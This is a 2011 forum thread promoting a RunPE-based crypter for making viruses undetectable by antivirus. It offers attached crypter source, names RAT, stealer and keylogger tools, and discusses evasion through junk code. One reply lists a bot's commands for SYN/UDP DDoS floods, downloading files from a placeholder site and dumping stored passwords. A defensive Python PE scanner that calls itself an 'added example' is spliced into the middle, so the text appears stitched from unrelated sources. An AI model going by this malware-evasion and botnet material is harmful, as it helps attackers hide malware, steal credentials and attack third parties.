Posted January 5, 2011
Hello, I am here today with the executable that can obfuscate the virus and make it fully undetectable by anti-viruses. This executable uses RunPE techniques to inject into another process and dump the crypted code into memory, and hence the executable's code remains undetected by anti-viruses. These crypters are programmed by individuals and hence remain undetected most of the time. Mostly they are coded in VB or .NET, and hence you will find most of the viruses showing VB attributes during PE scans, but mostly the viruses/RATs/stealers/bots/worms are coded in Borland Delphi.
Examples:
1) RATs: CyberGate, Blackshades, Pixel, SpyNet, DarkComet etc.
2) Stealers: iStealer v6.0 (latest), Albertino, Maya password stealer etc.
3) Keyloggers: Albertino, Rapzo, Irtech etc.
4) Crypters: iCrypt, Galaxy, Blackout AIO, Demon, CypherX (www.crypters.net) etc.
The sample crypter source code is attached here: CodingNation_Crypter_Source.rar
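The post's claim that crypted samples "show VB attributes during PE scans" comes down to two static artifacts: a VB6 stub imports the MSVBVM60.DLL runtime, and a .NET stub carries a CLR header in data directory 14. The following Python scanner is an added example of that triage check, written for this page; it is not the attached crypter source or any code from the thread. It parses the DOS/COFF/optional headers, walks the import directory table and reads the CLR directory entry. The `build_sample_pe` helper constructs minimal, non-runnable in-memory PE32 images purely as synthetic test data (not real malware samples), one with a VB runtime import and one with a CLR header. What it shows is exactly the point of the post: the scan reports the toolchain of the outer stub, while a RunPE payload that is only decrypted in memory never appears in the on-disk import table.

```python
import struct

_DIR_IMPORT, _DIR_CLR = 1, 14  # data directory indexes used by the scanner


def _rva_to_offset(sections, rva):
    """Map an RVA to a file offset using the section table."""
    for _name, va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return raw_ptr + (rva - va)
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _cstring(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def scan_pe(data):
    """Static triage of a PE image: section names, imported DLLs, toolchain hints."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    ndirs = struct.unpack_from("<I", data, opt + (108 if pe32plus else 92))[0]
    dirs_off = opt + (112 if pe32plus else 96)

    def directory(i):
        return struct.unpack_from("<II", data, dirs_off + 8 * i) if i < ndirs else (0, 0)

    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, raw_ptr, raw_size))

    # Walk the import directory table: one 20-byte descriptor per DLL, zero-terminated.
    imports = []
    imp_rva, _ = directory(_DIR_IMPORT)
    if imp_rva:
        off = _rva_to_offset(sections, imp_rva)
        while True:
            _oft, _ts, _fwd, name_rva, _ft = struct.unpack_from("<IIIII", data, off)
            if name_rva == 0:
                break
            imports.append(_cstring(data, _rva_to_offset(sections, name_rva)).upper())
            off += 20

    clr_rva, clr_size = directory(_DIR_CLR)
    dotnet = clr_rva != 0 and clr_size != 0  # CLR header present => managed (.NET) stub
    vb6 = any(d in ("MSVBVM60.DLL", "MSVBVM50.DLL") for d in imports)  # VB runtime import
    if dotnet:
        toolchain = ".NET (CLR header present)"
    elif vb6:
        toolchain = "Visual Basic 6 (MSVBVM runtime import)"
    else:
        toolchain = "native/unknown"
    return {"machine": machine, "entry_point": entry, "sections": [s[0] for s in sections],
            "imports": imports, "dotnet": dotnet, "vb6": vb6, "toolchain": toolchain}


def build_sample_pe(dll_names=(), with_clr=False):
    """Build a minimal, non-runnable PE32 image in memory (constructed test data, not a real sample)."""
    sec_rva, sec_raw, sec_size = 0x1000, 0x200, 0x200
    strings, name_rvas = bytearray(), []
    for dll in dll_names:
        name_rvas.append(sec_rva + 20 * (len(dll_names) + 1) + len(strings))
        strings += dll.encode("ascii") + b"\0"
    body = b"".join(struct.pack("<IIIII", 0, 0, 0, rva, 0) for rva in name_rvas) + bytes(20) + strings
    body += bytes(sec_size - len(body))
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, sec_rva)                     # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)   # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, sec_raw)            # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                           # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    if dll_names:
        struct.pack_into("<II", opt, 96 + 8 * _DIR_IMPORT, sec_rva, 20 * (len(dll_names) + 1))
    if with_clr:
        struct.pack_into("<II", opt, 96 + 8 * _DIR_CLR, sec_rva + 0x100, 72)  # CLR header entry
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    section = struct.pack("<8sIIIIIIHHI", b".text", sec_size, sec_rva, sec_size, sec_raw, 0, 0, 0, 0, 0x60000020)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    return headers + bytes(sec_raw - len(headers)) + body


if __name__ == "__main__":
    for label, sample in (("vb6 stub", build_sample_pe(("MSVBVM60.DLL", "KERNEL32.dll"))),
                          (".net stub", build_sample_pe(with_clr=True))):
        print(label, scan_pe(sample))
```

To run it against a real file, pass `open(path, "rb").read()` to `scan_pe`. The heuristics are deliberately narrow: a CLR header or a VB runtime import identifies the stub's toolchain, nothing more, and a packed or hollowed payload only shows up once the process is inspected in memory.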
March 30, 2011
http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801
http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813
I think the code below must not be present in a crypter project; this makes it behave like a bot:
hello [login]
.bai [logout]
.removeAll [removes ALL bots]
DDoS CMDs
./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful, might destroy bots
Download/Update
./download (http://site.com/file.exe C:\file.exe 1)
./update (????)
MSC
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)
June 1, 2011
@Cipher: Thanks mate, but those are old goodies; I played with them when I was learning CEH. These goodies are no more; for example in our team ICA, we don't use them like this. Try the self-mod version of Fly Crypter. And also a nice collection of RAT names.
@ksanket: These codes are not used to make it behave like a bot; these codes are part of a Trojan or stealer.
July 22, 2011 (Author)
@Blue indian: I guess you are talking about a polymorphic engine, but still 99% of the crypters on the market use the same PE injection technique. I don't know much about the polymorphic engine, though; still they manage to make it FUD by adding junk code, by changing the variable names and by some advanced techniques.